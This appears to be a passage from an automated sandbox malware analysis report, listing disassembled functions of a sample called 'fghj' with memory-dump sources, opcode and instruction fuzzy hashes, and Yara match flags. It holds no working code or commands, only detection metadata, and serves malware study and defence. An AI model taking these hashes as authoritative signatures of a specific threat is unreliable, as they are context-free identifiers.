                                                                                                                                                                                                                    • Instruction ID: 857fcaf5365e08c7d1d20fc0fbfc186cb79768804f65828dbcd6d10bb059a1ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 448e38da1af34a2956f60fa2a11141aa57d259a228dfbd4a8eb9467670502620
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12611727A6DAE04BD3299A3C4CB12BA7ED24E97234F3D87EDD9F18B3E1D56548058340
                                                                                                                                                                                                                    Function 00B1C7A5 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8ef91c3488042546a025d8b622269e2cf6e1d2302b35b3a604ab1b98323f5852
                                                                                                                                                                                                                    • Instruction ID: d61e8a352158fea3d436548b18ce2d819e99967c3c14a861f245f94f2a342e9b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ef91c3488042546a025d8b622269e2cf6e1d2302b35b3a604ab1b98323f5852
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51615A33A559904BC7298E7C4C912FAAE935BE737073E83BAD9B58B3E1C6354C418390
                                                                                                                                                                                                                    Function 00B32555 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8cfc3c407f0b7f80de5e646ee44d155152a59ac0515a457b1b2c2e89e57d2cd7
                                                                                                                                                                                                                    • Instruction ID: 2ca34fa5c7eb585fb94edb9c76f8167692d6432cb6e002c5ac6bf60cd09b61f0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cfc3c407f0b7f80de5e646ee44d155152a59ac0515a457b1b2c2e89e57d2cd7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2761E43B6599804BD3289B3D4C6227A7AD34FD3330B3DC7AEE6B28B3E5D9654C014250
                                                                                                                                                                                                                    Function 00B327C5 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 912c0a622066721b79d2eaf27c6c83d1171b6cf4c363d286543075c069dd2f21
                                                                                                                                                                                                                    • Instruction ID: 6909283f95d1dfe922697dd2faaa7eaf4e0c4b95152e1a993f11e8bb05866d36
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 912c0a622066721b79d2eaf27c6c83d1171b6cf4c363d286543075c069dd2f21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B451F136B59A904BD3288A7C5CA13AA7AC34FD7230F3DC3BAE6F58B3E5D56588055340
                                                                                                                                                                                                                    Function 00B371E5 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a61f37d6fdac8d5a27701c267fd377a09b926456dccea061c75d9b0a23dc927e
                                                                                                                                                                                                                    • Instruction ID: 74dac85224a23408b72334fb86f5ac6092a677c09414d1bb4844c935e9b3ac6a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a61f37d6fdac8d5a27701c267fd377a09b926456dccea061c75d9b0a23dc927e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01516BB15087548FE324DF69C89435BBBE1FBC5354F144A2DE4E987390E779DA088B82
                                                                                                                                                                                                                    Function 00B390A5 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 33dc28ca3cf959c38c7edd8b1c087f05758602ef981507cdea1ab0f65e19b56d
                                                                                                                                                                                                                    • Instruction ID: 3b0545d1e56423c5687aa3c1a6cfb32b736d679a80b8cb0f2ef84d3d9cd94382
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33dc28ca3cf959c38c7edd8b1c087f05758602ef981507cdea1ab0f65e19b56d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56513A7160C7855FC714CE6CD4C16AFBBE2DB8A304F288AADE8D98B386C675D845C741
                                                                                                                                                                                                                    Function 00B1F6E5 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cd60f81663e377fdaaabd229f3d98f9e42d35eff297a1d71a46002b729f5c405
                                                                                                                                                                                                                    • Instruction ID: b3934302ab0c328dd8823153fc557956083e317b10c7fd97a80e8871a0e51c6f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd60f81663e377fdaaabd229f3d98f9e42d35eff297a1d71a46002b729f5c405
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA511223B599828BD3388A3C5C612BA6AD34BD3234B7DC3BAE5B5C73E5D5754C428350
                                                                                                                                                                                                                    Function 00B2C85B Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 654f05e1e82c5cf16fbc65eb2bba006448160025aa1ca96e826c65d3f36c3408
                                                                                                                                                                                                                    • Instruction ID: 45b1951151f821404711c3993b0244f56a8df2162b0edaaac0d3cd9efb5aa19a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 654f05e1e82c5cf16fbc65eb2bba006448160025aa1ca96e826c65d3f36c3408
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39416AA0A0D3E04AE3258B2994603BABFD2DFD3345F1CC5EDC1CA9B24ACA3944078715
                                                                                                                                                                                                                    Function 00B23DEE Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d6053a994f670679b0211946cbcda9870aa3eaedd793a5084e53e8abd3725b3f
                                                                                                                                                                                                                    • Instruction ID: dc5423e2ec634eeb36f1a1f005f51006aa6fa55556d4379589e698750b7a5f1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6053a994f670679b0211946cbcda9870aa3eaedd793a5084e53e8abd3725b3f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41BE359087604BC325CF299890475BFE29B96614B4EC1ECD4EA8B353DA39CE45C7D1
                                                                                                                                                                                                                    Function 00B2A398 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 0b521d4f906275ff6f8888a3ca4628f35375a15bdac394b30f8ee1e565eeccc3
                                                                                                                                                                                                                    • Instruction ID: 77b42d32c3d50c8b92e995cda16d5ccb85b1187dde30bd7f8b9078ae7baf227f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b521d4f906275ff6f8888a3ca4628f35375a15bdac394b30f8ee1e565eeccc3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851AE7261C3658FD714CF29981169FB7E2EBC5304F09892DD49AEB281CA74C60ACBC6
                                                                                                                                                                                                                    Function 00B18252 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 104d9f79f7e253dd9de2fe7c9681d1ac3ffc6de74c2e86ffcf44c5d0808d9bf9
                                                                                                                                                                                                                    • Instruction ID: dab091eca9abb0aa694a2c2576cea9ccf4b237faec4fe7a06cde097d11b2d53a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 104d9f79f7e253dd9de2fe7c9681d1ac3ffc6de74c2e86ffcf44c5d0808d9bf9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D641C3702047018FC725CF29D4A1662B3F1FF563147189A9CD8938BBA5EB34A846CB54
                                                                                                                                                                                                                    Function 00B183D1 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e75b970dcf2f9995d1a5b461c8948541d3a5a5d7e64a03c4286438ff928eef90
                                                                                                                                                                                                                    • Instruction ID: f380b9fd17b44efb67fbb0ad14bf67b49baecafd2d2468a62f6bfab9ba2a68d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e75b970dcf2f9995d1a5b461c8948541d3a5a5d7e64a03c4286438ff928eef90
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA4127719002028BD7248F34CC927B637E1FFA2390F6941E9E4968B7A1EF389945D755
                                                                                                                                                                                                                    Function 00B2C829 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 668e4e6f6579e28277643c857c114a860e2bf554e8ef47e101acd310fba1c42b
                                                                                                                                                                                                                    • Instruction ID: 5cca11e8c21fcd7034af55024334a25aca5b2699c93cf7e0a78aa7744da205df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 668e4e6f6579e28277643c857c114a860e2bf554e8ef47e101acd310fba1c42b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB3148A490C3F08AD7328F2594503BABFD2AFD3345F1885EDC5C9AB246CA784446C756
                                                                                                                                                                                                                    Function 00B19F6E Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 938d426ea1409ca7f31b0458929ff267a91462d0cf255423dc722233359d8b5c
                                                                                                                                                                                                                    • Instruction ID: da2b32eb2000184e6c1d77ce99010ee6bf158d13495ae37032df3445fb5e2e42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938d426ea1409ca7f31b0458929ff267a91462d0cf255423dc722233359d8b5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2310274205640AFDB298F24C8E99777BE2EF57700B5494ACE58B87622D733FC429B05
                                                                                                                                                                                                                    Function 00B19E59 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3f8465866e58c0170160b33b9873ddbe5174c7fc560b6e239fbd7f3b3f4ecfe9
                                                                                                                                                                                                                    • Instruction ID: d37fbf7f9364cc27e2f2298874dda403b2397596a0252165f51033ea8ec44d67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f8465866e58c0170160b33b9873ddbe5174c7fc560b6e239fbd7f3b3f4ecfe9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E3161705047C18FE7628F3984607A2BFE0EF67311F1846C8D5E69B2A2D625A885CB61
                                                                                                                                                                                                                    Function 00B16C9C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1b8d8fc193216e1b73cd753a561f183393480f4740c1b24d0bc1e5a09766f544
                                                                                                                                                                                                                    • Instruction ID: 9f7b8bfadd9c89e998ee34d682ec93e24462be414abd4c78b86776547ea05e98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b8d8fc193216e1b73cd753a561f183393480f4740c1b24d0bc1e5a09766f544
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4129392182508FC709DF14C8915BEBFE1EF86311FA449BCE4C29B355DA38DC529B56
                                                                                                                                                                                                                    Function 00B0BE91 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 0ceaf57eeb7e9f0458d3304fba17df650837ca588da2bb7ceb8d5b1f7162af88
                                                                                                                                                                                                                    • Instruction ID: 4e8b1f62ba76e27582ee15548c77c2acecf65fadccf762003faa7e36822cdcb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ceaf57eeb7e9f0458d3304fba17df650837ca588da2bb7ceb8d5b1f7162af88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17312E72D9563457EB388FB98C516DEB570AB65300F0945BDEC49B7381CB394E018F90
                                                                                                                                                                                                                    Function 003A873A Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8535c9886879715d47f053a0bc1f19842ad049800703a54e314d7d200f5250d5
                                                                                                                                                                                                                    • Instruction ID: ad6b67f823f119424c0fd3545dea8354206030b433d2bbab8d1cb6d18980cb4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8535c9886879715d47f053a0bc1f19842ad049800703a54e314d7d200f5250d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A312473D443128FD74BEF79EC8A15A372AEB83311B81872AE902DB4A6CF3445418A94
                                                                                                                                                                                                                    Function 00B00F9B Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                    • Instruction ID: be1756fa9a7dbd2355bcc13bba5c8a3fc0fa559178b50fbeeebc1a7f00830f4b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C516574E00109DFCB08CF88C590AAEBBB2FF48314F248599D815AB355D735AE91DF94
                                                                                                                                                                                                                    Function 00B2420B Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cb18d1b203cfed850cda16fa892cb4713cd4e0586d2d1b53a0d81e0d30658c2c
                                                                                                                                                                                                                    • Instruction ID: 9052c8dc61a48b977c68ac1d7d1cd145de7ae05d02695d3f4162e89856616cf1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb18d1b203cfed850cda16fa892cb4713cd4e0586d2d1b53a0d81e0d30658c2c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A431E1786182229FD314CF15DC82777BFE5FB86320F64886CF8C697295DB3898499B06
                                                                                                                                                                                                                    Function 00B3D65A Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1c41c6a37a47ffaecad0973457640e5daecf0385cbe4c4fde4b3eb29bae3bcc4
                                                                                                                                                                                                                    • Instruction ID: ac8eb1caab11daef20e3c3ba0695685e3940651360f49eafa5b56e43c36b02a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c41c6a37a47ffaecad0973457640e5daecf0385cbe4c4fde4b3eb29bae3bcc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF2137357186510BD70CCF3898E2127BBD79B9B264F28867DC066CB2E2DA30D9028744
                                                                                                                                                                                                                    Function 00B1B020 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8139f76f0c5936e2b1024cb158894e07f7a41ad65661ce6d8774785de358705f
                                                                                                                                                                                                                    • Instruction ID: 160f02492d9e7c42ee37f29348ace4efb7678ad496abcb486e7f62174ad0fbf7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8139f76f0c5936e2b1024cb158894e07f7a41ad65661ce6d8774785de358705f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A31F3B6558B02ABE315CF3AC884442BBB3BBA9310B15876DD0652BB59CB74F111CBD0
                                                                                                                                                                                                                    Function 00B29A11 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8e4332cb6f2fc0b1020c7dc28d07ac890a07dfbc198784fceab0e6ffbab3e203
                                                                                                                                                                                                                    • Instruction ID: 01361ee2f182938372ba9de4fdbc3e7209e4047010ba19596b4d03d95d272dce
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4332cb6f2fc0b1020c7dc28d07ac890a07dfbc198784fceab0e6ffbab3e203
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8721AF71508311CFC714DF28C86166BB7F1EF86310F0499ACE5DA9B2A0EB78D904CB56
                                                                                                                                                                                                                    Function 00B24785 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7e7914dc596522a1aa64a5f96efbd83850895e1d7755d43ae7fc45d480bcf842
                                                                                                                                                                                                                    • Instruction ID: 2ac1cec02b8365cf6612396b10d6979be7d03f6c1641271910c48020f9933d06
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7914dc596522a1aa64a5f96efbd83850895e1d7755d43ae7fc45d480bcf842
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31353260C3208FD314CF25D84179BB6A2EBC2700F19C53CD9D56B284CA748806CBC2
                                                                                                                                                                                                                    Function 00B19D16 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
